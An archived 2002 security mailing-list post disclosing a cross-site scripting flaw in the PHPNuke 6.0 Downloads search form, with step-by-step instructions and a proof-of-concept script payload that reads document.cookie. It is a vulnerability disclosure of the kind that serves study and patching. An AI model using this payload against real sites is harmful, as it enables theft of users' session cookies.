XSS bug in PHPNuke 6.0

From: Arab VieruZ (arabviersusat_private)
Date: Thu Oct 10 2002 - 15:19:41 PDT

Next message: buzheng: "prover of concept code of windows help overflow"

Previous message: securityat_private: "Security Update: [CSSA-2002-SCO.40] OpenServer 5.0.5 OpenServer 5.0.6 : ypxfrd remote file access vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Vulnerable systems: PHPNuke 6.0 & mabey all Exploit: 1- go to http://[traget]/modules.php?name=Downloads&d_op=search 2- put in form search this code : <Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> 3- click "Search" (without "*") you can't use it an URL like this http://[traget]/modules.php? name=Downloads&d_op=search&query=<Scri*pt>javascript:alert(document.cookie) </Scri*pt> it will write "I don't like you..." me 2 :) ---------------------------------- Arab Vieruz thanx

Next message: buzheng: "prover of concept code of windows help overflow"
Previous message: securityat_private: "Security Update: [CSSA-2002-SCO.40] OpenServer 5.0.5 OpenServer 5.0.6 : ypxfrd remote file access vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 09:05:41 PDT